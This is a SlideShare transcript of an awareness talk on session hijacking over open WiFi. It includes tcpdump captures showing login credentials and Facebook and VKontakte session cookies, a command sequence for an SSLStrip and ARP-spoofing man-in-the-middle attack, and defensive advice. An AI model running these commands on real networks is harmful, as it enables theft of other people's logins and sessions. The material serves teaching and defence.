Session hijacking for dummies
Upcoming SlideShare
Loading in...5
×
 

Session hijacking for dummies

on

  • 2,921 views

 

Statistics

Views

Total Views
2,921
Slideshare-icon Views on SlideShare
2,918
Embed Views
3

Actions

Likes
1
Downloads
23
Comments
0

2 Embeds 3

http://eisenrah.tumblr.com 2
http://a0.twimg.com 1

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    Session hijacking for dummies Session hijacking for dummies Presentation Transcript

    • session hijacking for dummies Friedemann Wulff-Woesten WDCM Dresden 1
    • What is this all about?• especially in the czech republic: unencrypted WiFi everywhere• Facebook for many people THE platform to communicate• many mobile devices have Facebook Apps even more data = possibilities to attack• problem: almost no one types https:// browser always connects to Port 80 2
    • What is this all about?• this is a serious security threat• tools are freely available, no one cares• Facebook ignores the problem• Google went Full SSL 3
    • HTTP is stateless• Request, Response• Send username/password once• Receive cookie• Use cookie for all future requests 4
    • Cookies need to be kept secret 5
    • 6
    • 7
    • even better: WiFi• Cookies shouted through the air• Someone just has to start listening 8
    • let’s listen...imac:~ eisenrah$ sudo tcpdump -A -v -i en1 tcp port 80tcpdump: listening on en1, link-type EN10MB (Ethernet), capture size 65535 bytes[...]17:01:36.119066 IP (tos 0x0, ttl 64, id 45430, offset 0, flags [DF], proto TCP (6), length 102) imac.52070 > w9e.rzone.de.http: Flags [P.], cksum 0x3e95 (correct), seq 854:904, ack 1, win33120, options [nop,nop,TS val 709324897 ecr 1167316720], length 50E..f.v@.@.3.....Q....f.P.V.6)!y....`>......*GpaE...username=wdcmdd&password=meinsogeheimespasswort[...] 9
    • Example: RequestPOST /login.php?login_attempt=1 HTTP/1.1Host: login.facebook.comemail=e2@eisenrah.com&pass=ichmagdietu 10
    • Example: ResponseHTTP/1.1 302 FoundLocation: http://www.facebook.com/home.php?Set-Cookie:xs=a1cac26e11645bca984ea98f98a6a19c;path=/; domain=.facebook.com; httponly 11
    • Problem: AJAXgenerate session cookies without clicking anywhere 12
    • tcpdump: В Контакте17:18:32.656064 IP (tos 0x0, ttl 64, id 7684, offset 0, flags [DF], proto TCP (6), length 674) imac.52256 > srv64-131.vkontakte.ru.http: Flags [P.], cksum 0x84a6 (correct), seq 930:1552, ack 743, win 65535, options[nop,nop,TS val 710338737 ecr 2377981922], length 622E.....@.@..[....W..@. .P*......d...........*V......POST /im915 HTTP/1.1Host: q63.queue.vk.comConnection: keep-aliveReferer: http://q63.queue.vk.com/q_frame.php?3Content-Length: 307Origin: http://q63.queue.vk.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.107 Safari/535.1Content-Type: application/x-www-form-urlencodedAccept: */*Accept-Encoding: gzip,deflate,sdchAccept-Language: en-US,en;q=0.8Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3Cookie: remixchk=5; remixlang=0;remixsid=2a72ff88d120569ae115f1e01885c5f14674dab175a1fb5392441d4e9840 13
    • tcpdump: Facebook21:39:06.513002 IP (tos 0x0, ttl 64, id 35287, offset 0, flags [DF], proto TCP (6), length 1306) imac.50781 > channel2-02-01-snc4.facebook.com.http: Flags [P.], cksum 0xca09 (correct), seq 1:1255, ack 263, win 32830, options[nop,nop,TS val 689948758 ecr 2100724491], length 1254E.....@.@.e@....B..$.].P..!p.......>. .....)..V}6..GET /x/4057007781/1328384618/true/p_100001070666929=23 HTTP/1.1Host: 0.44.channel.facebook.comConnection: keep-aliveReferer: http://0.44.channel.facebook.com/iframe/11?r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyX%2Fr%2Fimb8Z50C5TH.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyF%2Fr%2Fx3LLBUl8mEP.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyH%2Fr%2FwtfO3BqjZSC.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2Fyz%2Fr%2FhFfiXiUF_l3.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyE%2Fr%2FSp2IUK7A8Z2.jsUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1Accept: */*Accept-Encoding: gzip,deflate,sdchAccept-Language: en-US,en;q=0.8Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3Cookie: c_user=100001070666929; datr=-J0UTvLh4Us6mmd4HoAFaYWl; L=2; lu=Rg43lZE4nMjM3vtnDl9S-BPw;sct=1312918035; xs=60%3A8a0d1e5b0344cca655fd1566026f513c; p=44;act=1312918349733%2F16;presence=EM312918690L44REp_5f1B01070666929F23X312918690038Y1312918638OQ0EsF0CEblFDacF19G312918689PEuoFD1B01609907228FDexpF1312918709806EflF_5b1_5dEolF0CE1B00195332181FDexpF13129187B69EflF_5b_5dEolF-1CCEalFD1B01609907228FDiF0EmF0CCCC; wd=840x952 14
    • facebook.js changes 15
    • What can you do?• always full SSL - type https:// in address bar• click “Log out” (doesnt guarantee session is invalidated)• use at least WPAII• use a VPN e.g. https://webvpn.zih.tu-dresden.de/ 16
    • Even worse• Facebook-Like Button,cookies sent with HTTP) (included in many blogs - Tweet-Buttons• dirty: active attack with SSLStrip (redirects every HTTPS request to HTTP) 17
    • Example: SSLStripsudo -secho "1" > /proc/sys/net/ipv4/ip_forwardiptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000sslstrip -l 1000ip route show | grep default | awk { print $3}arpspoof <gatewayIP>ettercap -Tzq 18
    • friedemann@wulff-woesten.de http://wiki.eisenrah.com/wiki/Sessions 19
    • @cdine@codebutler @eisenrah@moxie__ 20
    • Sources• elmo and cookie monster http://1450knsi.com/assets/images/Elmo%20Cookie%20Monster.jpg• wireshark collage http://www.flickr.com/photos/43707902@N04/4022449442/ http://www.flickr.com/photos/43707902@N04/4022445684/ http://carlosadlrs.files.wordpress.com/2011/07/wireshark-logo.png• wireshark screenshot http://dump.taylor-hughes.com/wireshark-tadalist.png• firesheep facebook.js screenshot http://1.bp.blogspot.com/_BQgAZ7cjkHQ/TTbVkUVb4DI/AAAAAAAABcg/ NWl1KI5PCWA/s1600/Screenshot-9.png 21